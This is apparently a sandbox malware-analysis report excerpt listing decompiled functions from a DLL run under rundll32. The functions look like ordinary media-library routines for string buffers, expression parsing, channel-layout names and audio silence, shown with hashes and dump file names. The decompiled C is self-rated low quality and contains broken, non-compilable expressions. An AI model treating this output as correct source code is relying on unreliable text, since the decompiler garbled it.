mv_bprint_init.F086 ref: 1001225D
mv_bprint_escape.F086 ref: 100122B3
mv_bprint_append_data.F086 ref: 100122CC
mv_bprint_escape.F086 ref: 100122EE
mv_bprint_finalize.F086 ref: 1001231B

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprint_escape$mv_bprint_append_datamv_bprint_finalizemv_bprint_initmv_strdup
String ID:
API String ID: 806756221-0
Opcode ID: 55f0c84e98da42de065d76c2acb9437629b6bfeb986306e9a32b1f14191fa22a
Instruction ID: 1123dba4393114ef0ad0658bdbc6ab6a3ceb4212d851131ba1441c628290b326
Opcode Fuzzy Hash: 55f0c84e98da42de065d76c2acb9437629b6bfeb986306e9a32b1f14191fa22a
Instruction Fuzzy Hash: 8C4114B55093449BC360CF28C08025ABBE5FF85394F55892EE9988B341E636EA95CB46

Uniqueness

Uniqueness Score: -1.00%

Function 1002F226 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 100COMMON

Download Yara Rule

APIs

mv_expr_parse_and_eval.F086 ref: 1002F115

Strings

default, xrefs: 1002EFF2
all, xrefs: 1002F08F
min, xrefs: 1002F03F
max, xrefs: 1002F025
none, xrefs: 1002F06A

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_expr_parse_and_eval
String ID: all$default$max$min$none
API String ID: 2217327432-3292705889
Opcode ID: 10902ce6959dcda57c3802d1404c17b7355792d975e56109f361b0065da62f55
Instruction ID: 98b80aec2e3a380831a781cac75c10b25bfbbdd989e4a5369e61f7fda47c1b04
Opcode Fuzzy Hash: 10902ce6959dcda57c3802d1404c17b7355792d975e56109f361b0065da62f55
Instruction Fuzzy Hash: CC41F3B5A097418BC391EF28E04039BBBE5FFC9354F618A2EE5C9C7200EB71D9459B42

Uniqueness

Uniqueness Score: -1.00%

Function 10092340 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 10092352
_errno.MSVCRT ref: 10092370
rand.MSVCRT ref: 100923D0
_sopen.MSVCRT ref: 10092416
_errno.MSVCRT ref: 10092424

Strings

XXXX, xrefs: 10092368

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _errno$_sopenrandstrlen
String ID: XXXX
API String ID: 1081397658-1518373315
Opcode ID: 82e0733fef7f5bb36d99413f1072fc2f656cde989d35784bfb4da4dbfebec7eb
Instruction ID: 5ba2c4e2c30cf57021d4c67dc99ab4cf3299af9f9df0caf2ec803c7fcbdd4207
Opcode Fuzzy Hash: 82e0733fef7f5bb36d99413f1072fc2f656cde989d35784bfb4da4dbfebec7eb
Instruction Fuzzy Hash: A62137B190934A9FC704EF24889015E7BE4EF86394F11C92DF4998B291D6399A49DB81

Uniqueness

Uniqueness Score: -1.00%

Function 1000C220 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E1000C220() {
				char* _t55;
				void* _t57;
				void* _t59;
				void* _t63;
				unsigned int _t64;
				signed char _t66;
				void* _t67;
				unsigned int _t72;
				unsigned int _t73;
				void* _t75;
				intOrPtr _t77;
				void* _t81;
				int _t82;
				signed int _t83;
				intOrPtr _t88;
				void* _t92;
				int _t95;
				signed int _t96;
				void* _t103;
				void* _t104;
				void* _t107;
				void* _t113;
				void* _t116;
				void** _t119;
				void* _t122;
				intOrPtr* _t123;
				void** _t125;

				_t123 = _t122 - 0x1c;
				_t77 =  *((intOrPtr*)(_t123 + 0x20));
				_t88 =  *((intOrPtr*)(_t123 + 0x24)) - 0x400;
				if(_t88 <= 0x3ff) {
					 *((intOrPtr*)(_t123 + 8)) = _t88;
					_t55 = "AMBI%d";
					 *(_t123 + 4) = _t55;
					 *_t123 = _t77;
					L1();
					return _t55;
				} else {
					if(__eax <= 0x28) {
						__edx =  *(0x100b2280 + __eax * 8);
						if(__edx == 0) {
							goto L34;
						} else {
							 *(__esp + 8) = __edx;
							__eax = "%s";
							 *(__esp + 4) = __eax;
							 *__esp = __ecx;
							L1();
							__esp = __esp + 0x1c;
							return __eax;
						}
					} else {
						if(__eax != 0xffffffff) {
							L34:
							 *(__esp + 8) = __eax;
							__eax = "USR%d";
							 *(__esp + 4) = __eax;
							 *__esp = __ecx;
							L1();
							__esp = __esp + 0x1c;
							return __eax;
						} else {
							 *((intOrPtr*)(__esp + 0x20)) = __ecx;
							__edx = "NONE";
							 *(__esp + 0x24) = "NONE";
							__esp = __esp + 0x1c;
							_t125 = _t123 - 0x2c;
							_t119 = _t125[0x10];
							_t72 = _t119[2];
							_t125[6] =  &(_t119[4]);
							while(1) {
								_t57 = _t119[1];
								_t90 =  <=  ? _t57 : _t72;
								_t73 = _t72 - ( <=  ? _t57 : _t72);
								if(_t73 != 0) {
									goto L2;
								}
								 *_t125 = 0;
								_t125[3] =  &(_t125[0x12]);
								_t125[2] = _t125[0x11];
								_t125[1] = 0;
								_t59 = L10096020();
								_t113 = _t59;
								if(_t59 > 0) {
									L4:
									_t92 = _t119[2];
									_t64 = _t119[3];
									_t75 = _t119[1];
									if(_t92 == _t64 || _t75 >= _t92) {
										L25:
										_t62 =  >  ? _t113 : 0xfffffffa - _t75;
										_t59 = ( >  ? _t113 : 0xfffffffa - _t75) + _t75;
										_t119[1] = 0xfffffffa;
										if(_t92 == 0) {
											goto L16;
										} else {
											_t94 =  >  ? _t59 : _t92 - 1;
											_t63 =  *_t119;
											 *((char*)(_t63 + ( >  ? _t59 : _t92 - 1))) = 0;
											return _t63;
										}
									} else {
										_t80 =  >  ? _t113 : 0xfffffffe - _t75;
										_t81 = _t75 + ( >  ? _t113 : 0xfffffffe - _t75) + 1;
										_t72 = _t64;
										if(_t64 >> 1 >= _t92) {
											_t72 = _t92 + _t92;
										}
										if(_t72 < _t81) {
											_t87 =  <=  ? _t64 : _t81;
											_t72 =  <=  ? _t64 : _t81;
										}
										_t103 =  *_t119;
										_t125[1] = _t72;
										if(_t103 == _t125[6]) {
											 *_t125 = 0;
											_t66 = L10028DA0();
											if(_t66 == 0) {
												goto L24;
											} else {
												goto L18;
											}
										} else {
											 *_t125 = _t103;
											_t66 = L10028DA0();
											if(_t66 == 0) {
												L24:
												_t75 = _t119[1];
												_t92 = _t119[2];
												goto L25;
											} else {
												if(_t103 == 0) {
													L18:
													_t95 = _t119[1];
													_t104 = _t66;
													_t116 =  *_t119;
													_t82 = _t95 + 1;
													_t125[7] = _t116;
													if(_t82 >= 8) {
														if((_t66 & 0x00000001) != 0) {
															_t83 =  *_t116 & 0x000000ff;
															_t104 = _t66 + 1;
															_t116 = _t116 + 1;
															 *_t66 = _t83;
															_t82 = _t95;
														}
														if((_t104 & 0x00000002) != 0) {
															_t96 =  *_t116 & 0x0000ffff;
															_t104 = _t104 + 2;
															_t116 = _t116 + 2;
															_t82 = _t82 - 2;
															 *(_t104 - 2) = _t96;
														}
														if((_t104 & 0x00000004) == 0) {
															goto L19;
														} else {
															_t107 = _t104 + 4;
															 *(_t107 - 4) =  *_t116;
															_t67 = memcpy(_t107, _t116 + 4, _t82 - 4);
															_t125 =  &(_t125[3]);
															goto L13;
														}
													} else {
														L19:
														_t67 = memcpy(_t104, _t116, _t82);
														_t125 =  &(_t125[3]);
														goto L13;
													}
													goto L36;
												}
												L13:
												 *_t119 = _t67;
												_t119[2] = _t72;
												continue;
											}
										}
									}
								} else {
									L16:
									return _t59;
								}
								goto L36;
								L2:
								_t125[3] =  &(_t125[0x12]);
								_t125[1] = _t73;
								_t125[2] = _t125[0x11];
								 *_t125 = _t57 +  *_t119;
								_t59 = L10096020();
								_t113 = _t59;
								if(_t59 <= 0) {
									goto L16;
								} else {
									if(_t59 < _t73) {
										goto L24;
									} else {
										goto L4;
									}
								}
								goto L36;
							}
						}
					}
				}
				L36:
			}

0x1000c220
0x1000c227
0x1000c22b
0x1000c237
0x1000c2a8
0x1000c2ac
0x1000c2b1
0x1000c2b5
0x1000c2b8
0x1000c2c0
0x1000c239
0x1000c23c
0x1000c260
0x1000c269
0x00000000
0x1000c26b
0x1000c26b
0x1000c26f
0x1000c274
0x1000c278
0x1000c27b
0x1000c280
0x1000c283
0x1000c283
0x1000c23e
0x1000c241
0x1000c288
0x1000c288
0x1000c28c
0x1000c291
0x1000c295
0x1000c298
0x1000c29d
0x1000c2a0
0x1000c243
0x1000c243
0x1000c247
0x1000c24c
0x1000c250
0x100089c4
0x100089c7
0x100089ce
0x100089d1
0x10008a7d
0x10008a7d
0x10008a84
0x10008a87
0x10008a89
0x00000000
0x00000000
0x10008a8f
0x10008a9a
0x10008aa2
0x10008aa8
0x10008aac
0x10008ab3
0x10008ab5
0x10008a13
0x10008a13
0x10008a16
0x10008a19
0x10008a1e
0x10008b26
0x10008b2f
0x10008b32
0x10008b36
0x10008b39
0x00000000
0x10008b3b
0x10008b3e
0x10008b41
0x10008b44
0x10008b4f
0x10008b4f
0x10008a2c
0x10008a37
0x10008a3c
0x10008a42
0x10008a44
0x10008a46
0x10008a46
0x10008a4b
0x10008a4f
0x10008a52
0x10008a52
0x10008a54
0x10008a57
0x10008a61
0x10008ac8
0x10008acf
0x10008ad6
0x00000000
0x00000000
0x00000000
0x00000000
0x10008a63
0x10008a63
0x10008a66
0x10008a6d
0x10008b20
0x10008b20
0x10008b23
0x00000000
0x10008a73
0x10008a75
0x10008ad8
0x10008ad8
0x10008adb
0x10008add
0x10008ae0
0x10008ae3
0x10008aea
0x10008af2
0x10008b50
0x10008b53
0x10008b56
0x10008b57
0x10008b59
0x10008b59
0x10008afa
0x10008b5d
0x10008b60
0x10008b63
0x10008b66
0x10008b69
0x10008b69
0x10008b02
0x00000000
0x10008b04
0x10008b06
0x10008b0f
0x10008b12
0x10008b12
0x00000000
0x10008b12
0x10008aec
0x10008aec
0x10008aec
0x10008aec
0x00000000
0x10008aec
0x00000000
0x10008aea
0x10008a77
0x10008a77
0x10008a7a
0x00000000
0x10008a7a
0x10008a6d
0x10008a61
0x10008abb
0x10008abb
0x10008ac2
0x10008ac2
0x00000000
0x100089e0
0x100089e7
0x100089ef
0x100089f5
0x100089f9
0x100089fc
0x10008a03
0x10008a05
0x00000000
0x10008a0b
0x10008a0d
0x00000000
0x00000000
0x00000000
0x00000000
0x10008a0d
0x00000000
0x10008a05
0x10008a7d
0x1000c241
0x1000c23c
0x00000000

APIs

mv_bprintf.F086 ref: 1000C27B
mv_bprintf.F086 ref: 1000C298
mv_bprintf.F086 ref: 1000C2B8

Strings

AMBI%d, xrefs: 1000C2AC
NONE, xrefs: 1000C247
USR%d, xrefs: 1000C28C

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprintf
String ID: AMBI%d$NONE$USR%d
API String ID: 3083893021-3656852315
Opcode ID: 79c1b8cc5645a9667c6a0867682904637ac744c720650d4db15b242002d3a8e6
Instruction ID: 215f8c01a0ebe083e3755320398acc4362dbfeb093f1504df316b337c640c054
Opcode Fuzzy Hash: 79c1b8cc5645a9667c6a0867682904637ac744c720650d4db15b242002d3a8e6
Instruction Fuzzy Hash: 16012CB8909B418BD304EF28848052EBAE1FF84284FD48A6DE4CC87755E639DA409B83

Uniqueness

Uniqueness Score: -1.00%

Function 1000C3C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E1000C3C0() {
				char* _t55;
				void* _t57;
				void* _t59;
				void* _t63;
				unsigned int _t64;
				signed char _t66;
				void* _t67;
				unsigned int _t72;
				unsigned int _t73;
				void* _t75;
				intOrPtr _t77;
				void* _t81;
				int _t82;
				signed int _t83;
				intOrPtr _t88;
				void* _t92;
				int _t95;
				signed int _t96;
				void* _t103;
				void* _t104;
				void* _t107;
				void* _t113;
				void* _t116;
				void** _t119;
				void* _t122;
				intOrPtr* _t123;
				void** _t125;

				_t123 = _t122 - 0x1c;
				_t77 =  *((intOrPtr*)(_t123 + 0x20));
				_t88 =  *((intOrPtr*)(_t123 + 0x24)) - 0x400;
				if(_t88 <= 0x3ff) {
					 *((intOrPtr*)(_t123 + 8)) = _t88;
					_t55 = "ambisonic ACN %d";
					 *(_t123 + 4) = _t55;
					 *_t123 = _t77;
					L1();
					return _t55;
				} else {
					if(__eax <= 0x28) {
						__edx =  *(0x100b2284 + __eax * 8);
						if(__edx == 0) {
							goto L34;
						} else {
							 *(__esp + 8) = __edx;
							__eax = "%s";
							 *(__esp + 4) = __eax;
							 *__esp = __ecx;
							L1();
							__esp = __esp + 0x1c;
							return __eax;
						}
					} else {
						if(__eax != 0xffffffff) {
							L34:
							 *(__esp + 8) = __eax;
							__eax = "user %d";
							 *(__esp + 4) = __eax;
							 *__esp = __ecx;
							L1();
							__esp = __esp + 0x1c;
							return __eax;
						} else {
							 *((intOrPtr*)(__esp + 0x20)) = __ecx;
							__edx = "none";
							 *(__esp + 0x24) = "none";
							__esp = __esp + 0x1c;
							_t125 = _t123 - 0x2c;
							_t119 = _t125[0x10];
							_t72 = _t119[2];
							_t125[6] =  &(_t119[4]);
							while(1) {
								_t57 = _t119[1];
								_t90 =  <=  ? _t57 : _t72;
								_t73 = _t72 - ( <=  ? _t57 : _t72);
								if(_t73 != 0) {
									goto L2;
								}
								 *_t125 = 0;
								_t125[3] =  &(_t125[0x12]);
								_t125[2] = _t125[0x11];
								_t125[1] = 0;
								_t59 = L10096020();
								_t113 = _t59;
								if(_t59 > 0) {
									L4:
									_t92 = _t119[2];
									_t64 = _t119[3];
									_t75 = _t119[1];
									if(_t92 == _t64 || _t75 >= _t92) {
										L25:
										_t62 =  >  ? _t113 : 0xfffffffa - _t75;
										_t59 = ( >  ? _t113 : 0xfffffffa - _t75) + _t75;
										_t119[1] = 0xfffffffa;
										if(_t92 == 0) {
											goto L16;
										} else {
											_t94 =  >  ? _t59 : _t92 - 1;
											_t63 =  *_t119;
											 *((char*)(_t63 + ( >  ? _t59 : _t92 - 1))) = 0;
											return _t63;
										}
									} else {
										_t80 =  >  ? _t113 : 0xfffffffe - _t75;
										_t81 = _t75 + ( >  ? _t113 : 0xfffffffe - _t75) + 1;
										_t72 = _t64;
										if(_t64 >> 1 >= _t92) {
											_t72 = _t92 + _t92;
										}
										if(_t72 < _t81) {
											_t87 =  <=  ? _t64 : _t81;
											_t72 =  <=  ? _t64 : _t81;
										}
										_t103 =  *_t119;
										_t125[1] = _t72;
										if(_t103 == _t125[6]) {
											 *_t125 = 0;
											_t66 = L10028DA0();
											if(_t66 == 0) {
												goto L24;
											} else {
												goto L18;
											}
										} else {
											 *_t125 = _t103;
											_t66 = L10028DA0();
											if(_t66 == 0) {
												L24:
												_t75 = _t119[1];
												_t92 = _t119[2];
												goto L25;
											} else {
												if(_t103 == 0) {
													L18:
													_t95 = _t119[1];
													_t104 = _t66;
													_t116 =  *_t119;
													_t82 = _t95 + 1;
													_t125[7] = _t116;
													if(_t82 >= 8) {
														if((_t66 & 0x00000001) != 0) {
															_t83 =  *_t116 & 0x000000ff;
															_t104 = _t66 + 1;
															_t116 = _t116 + 1;
															 *_t66 = _t83;
															_t82 = _t95;
														}
														if((_t104 & 0x00000002) != 0) {
															_t96 =  *_t116 & 0x0000ffff;
															_t104 = _t104 + 2;
															_t116 = _t116 + 2;
															_t82 = _t82 - 2;
															 *(_t104 - 2) = _t96;
														}
														if((_t104 & 0x00000004) == 0) {
															goto L19;
														} else {
															_t107 = _t104 + 4;
															 *(_t107 - 4) =  *_t116;
															_t67 = memcpy(_t107, _t116 + 4, _t82 - 4);
															_t125 =  &(_t125[3]);
															goto L13;
														}
													} else {
														L19:
														_t67 = memcpy(_t104, _t116, _t82);
														_t125 =  &(_t125[3]);
														goto L13;
													}
													goto L36;
												}
												L13:
												 *_t119 = _t67;
												_t119[2] = _t72;
												continue;
											}
										}
									}
								} else {
									L16:
									return _t59;
								}
								goto L36;
								L2:
								_t125[3] =  &(_t125[0x12]);
								_t125[1] = _t73;
								_t125[2] = _t125[0x11];
								 *_t125 = _t57 +  *_t119;
								_t59 = L10096020();
								_t113 = _t59;
								if(_t59 <= 0) {
									goto L16;
								} else {
									if(_t59 < _t73) {
										goto L24;
									} else {
										goto L4;
									}
								}
								goto L36;
							}
						}
					}
				}
				L36:
			}

0x1000c3c0
0x1000c3c7
0x1000c3cb
0x1000c3d7
0x1000c448
0x1000c44c
0x1000c451
0x1000c455
0x1000c458
0x1000c460
0x1000c3d9
0x1000c3dc
0x1000c400
0x1000c409
0x00000000
0x1000c40b
0x1000c40b
0x1000c40f
0x1000c414
0x1000c418
0x1000c41b
0x1000c420
0x1000c423
0x1000c423
0x1000c3de
0x1000c3e1
0x1000c428
0x1000c428
0x1000c42c
0x1000c431
0x1000c435
0x1000c438
0x1000c43d
0x1000c440
0x1000c3e3
0x1000c3e3
0x1000c3e7
0x1000c3ec
0x1000c3f0
0x100089c4
0x100089c7
0x100089ce
0x100089d1
0x10008a7d
0x10008a7d
0x10008a84
0x10008a87
0x10008a89
0x00000000
0x00000000
0x10008a8f
0x10008a9a
0x10008aa2
0x10008aa8
0x10008aac
0x10008ab3
0x10008ab5
0x10008a13
0x10008a13
0x10008a16
0x10008a19
0x10008a1e
0x10008b26
0x10008b2f
0x10008b32
0x10008b36
0x10008b39
0x00000000
0x10008b3b
0x10008b3e
0x10008b41
0x10008b44
0x10008b4f
0x10008b4f
0x10008a2c
0x10008a37
0x10008a3c
0x10008a42
0x10008a44
0x10008a46
0x10008a46
0x10008a4b
0x10008a4f
0x10008a52
0x10008a52
0x10008a54
0x10008a57
0x10008a61
0x10008ac8
0x10008acf
0x10008ad6
0x00000000
0x00000000
0x00000000
0x00000000
0x10008a63
0x10008a63
0x10008a66
0x10008a6d
0x10008b20
0x10008b20
0x10008b23
0x00000000
0x10008a73
0x10008a75
0x10008ad8
0x10008ad8
0x10008adb
0x10008add
0x10008ae0
0x10008ae3
0x10008aea
0x10008af2
0x10008b50
0x10008b53
0x10008b56
0x10008b57
0x10008b59
0x10008b59
0x10008afa
0x10008b5d
0x10008b60
0x10008b63
0x10008b66
0x10008b69
0x10008b69
0x10008b02
0x00000000
0x10008b04
0x10008b06
0x10008b0f
0x10008b12
0x10008b12
0x00000000
0x10008b12
0x10008aec
0x10008aec
0x10008aec
0x10008aec
0x00000000
0x10008aec
0x00000000
0x10008aea
0x10008a77
0x10008a77
0x10008a7a
0x00000000
0x10008a7a
0x10008a6d
0x10008a61
0x10008abb
0x10008abb
0x10008ac2
0x10008ac2
0x00000000
0x100089e0
0x100089e7
0x100089ef
0x100089f5
0x100089f9
0x100089fc
0x10008a03
0x10008a05
0x00000000
0x10008a0b
0x10008a0d
0x00000000
0x00000000
0x00000000
0x00000000
0x10008a0d
0x00000000
0x10008a05
0x10008a7d
0x1000c3e1
0x1000c3dc
0x00000000

APIs

mv_bprintf.F086 ref: 1000C41B
mv_bprintf.F086 ref: 1000C438
mv_bprintf.F086 ref: 1000C458

Strings

ambisonic ACN %d, xrefs: 1000C44C
none, xrefs: 1000C3E7
user %d, xrefs: 1000C42C

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprintf
String ID: ambisonic ACN %d$none$user %d
API String ID: 3083893021-4180635230
Opcode ID: 9c8de8448e6615b8fa7c2115a21e64c0d84a2e4daa03812f1183ed2e3bd7c657
Instruction ID: 324eb216ddd130d516033ba78e4077f7499b10045cf144ab3190435d7abd8d01
Opcode Fuzzy Hash: 9c8de8448e6615b8fa7c2115a21e64c0d84a2e4daa03812f1183ed2e3bd7c657
Instruction Fuzzy Hash: 77012CB8D09B418BD304EF28908152DBAE1FFC4288FD4CA6DE4CC87355E639DA408B53

Uniqueness

Uniqueness Score: -1.00%

Function 1003D010 Relevance: 9.2, APIs: 6, Instructions: 164
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E1003D010() {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t66;
				signed char* _t72;
				signed char* _t75;
				signed char* _t79;
				int _t83;
				void* _t85;
				signed int _t86;
				signed int _t91;
				signed int _t97;
				signed int _t98;
				signed int _t100;
				signed char _t101;
				unsigned int _t102;
				signed int _t103;
				void* _t105;
				signed int _t106;
				signed char* _t110;
				signed char* _t112;
				void* _t113;
				signed char* _t115;
				signed int _t116;
				signed int _t117;
				signed char* _t118;
				signed int _t119;
				signed int _t121;
				signed char** _t123;

				_t97 = _t123[0x18];
				_t112 = _t123[0x19];
				if(_t97 > 0xb) {
					_t66 = 1;
				} else {
					_t100 =  *(0x100bf9ec + (_t97 + _t97 * 4) * 4);
					_t66 =  !=  ? _t123[0x16] : 1;
				}
				 *_t123 = _t66;
				_t123[1] = 4;
				_t115 = E100291F0();
				 *(_t123[0x14]) = _t115;
				if(_t115 == 0) {
					_t123[0xb] = 0xfffffff4;
					goto L15;
				} else {
					_t123[4] = _t112;
					_t123[3] = _t97;
					 *_t123 = 0;
					_t123[2] = _t123[0x17];
					_t123[1] = _t123[0x16];
					_t72 = L1003CB90(_t97, 4, _t112, _t115);
					_t123[0xb] = _t72;
					if(_t72 < 0) {
						L22:
						 *_t123 = _t123[0x14];
						E100290E0();
						return _t123[0xb];
					} else {
						 *_t123 = _t72;
						_t75 = L10028D50();
						_t118 = _t75;
						if(_t75 == 0) {
							_t123[0xb] = 0xfffffff4;
							goto L22;
						} else {
							_t123[6] = _t112;
							_t123[5] = _t97;
							_t123[2] = _t118;
							 *_t123 = _t115;
							_t123[4] = _t123[0x17];
							_t123[3] = _t123[0x16];
							_t123[1] = _t123[0x15];
							_t79 = L1003CCD0();
							_t123[0xb] = _t79;
							if(_t79 < 0) {
								 *_t123 = _t118;
								L100290D0();
								goto L22;
							} else {
								if(_t97 > 0xb) {
									_t119 = 0;
									_t123[0x16] = 1;
									_t98 = 0;
									goto L9;
								} else {
									_t85 = 0x100bf9e0 + (_t97 + _t97 * 4) * 4;
									_t86 =  *(_t85 + 0xc);
									_t121 =  *(_t85 + 8) >> 3;
									if(_t86 == 0) {
										_t123[0x16] = 1;
										_t106 = _t123[0x17];
										_t119 = _t121 * _t123[0x16] * _t106;
										_t98 = ((_t86 & 0xffffff00 | _t97 == 0x00000005 | _t106 & 0xffffff00 | _t97 == 0x00000000) & 0x000000ff) << 7;
										goto L9;
									} else {
										_t91 = _t123[0x17];
										_t119 = _t121 * _t91;
										_t98 = ((_t91 & 0xffffff00 | _t97 == 0x00000000 | _t100 & 0xffffff00 | _t97 == 0x00000005) & 0x000000ff) << 7;
										if(_t123[0x16] > 0) {
											L9:
											_t110 = _t115;
											_t123[0xa] = _t115 + _t123[0x16] * 4;
											_t83 = _t98 * 0x1010101;
											do {
												_t101 =  *_t110;
												_t116 = _t119;
												_t113 = _t101;
												if(_t119 >= 8) {
													if((_t101 & 0x00000001) != 0) {
														 *_t101 = _t83;
														_t56 = _t119 - 1; // -1
														_t116 = _t56;
														_t113 = _t113 + 1;
													}
													if((_t113 & 0x00000002) != 0) {
														 *_t113 = _t83;
														_t116 = _t116 - 2;
														_t113 = _t113 + 2;
													}
													if((_t113 & 0x00000004) != 0) {
														 *_t113 = _t83;
														_t116 = _t116 - 4;
														_t113 = _t113 + 4;
													}
													_t102 = _t116;
													_t116 = _t116 & 0x00000003;
													_t103 = _t102 >> 2;
													_t83 = memset(_t113, _t83, _t103 << 2);
													_t123 =  &(_t123[3]);
													_t113 = _t113 + _t103;
												}
												_t117 = _t116 & 0x00000007;
												if(_t117 != 0) {
													_t105 = 0;
													do {
														 *(_t113 + _t105) = _t98;
														_t105 = _t105 + 1;
													} while (_t105 < _t117);
												}
												_t110 =  &(_t110[4]);
											} while (_t123[0xa] != _t110);
										}
									}
								}
								L15:
								return _t123[0xb];
							}
						}
					}
				}
			}

0x1003d017
0x1003d01b
0x1003d022
0x1003d198
0x1003d028
0x1003d02b
0x1003d039
0x1003d039
0x1003d03e
0x1003d046
0x1003d04f
0x1003d057
0x1003d059
0x1003d251
0x00000000
0x1003d05f
0x1003d05f
0x1003d067
0x1003d06b
0x1003d072
0x1003d07a
0x1003d07e
0x1003d083
0x1003d089
0x1003d1b0
0x1003d1b4
0x1003d1b7
0x1003d1c7
0x1003d08f
0x1003d08f
0x1003d092
0x1003d099
0x1003d09b
0x1003d25e
0x00000000
0x1003d0a1
0x1003d0a1
0x1003d0a9
0x1003d0ad
0x1003d0b1
0x1003d0b4
0x1003d0bc
0x1003d0c4
0x1003d0c8
0x1003d0cd
0x1003d0d3
0x1003d1a8
0x1003d1ab
0x00000000
0x1003d0d9
0x1003d0dc
0x1003d1d5
0x1003d1d7
0x1003d1db
0x00000000
0x1003d0e2
0x1003d0e5
0x1003d0ef
0x1003d0f2
0x1003d0f7
0x1003d229
0x1003d22d
0x1003d234
0x1003d24a
0x00000000
0x1003d0fd
0x1003d0fd
0x1003d101
0x1003d118
0x1003d11d
0x1003d11f
0x1003d123
0x1003d128
0x1003d12c
0x1003d140
0x1003d140
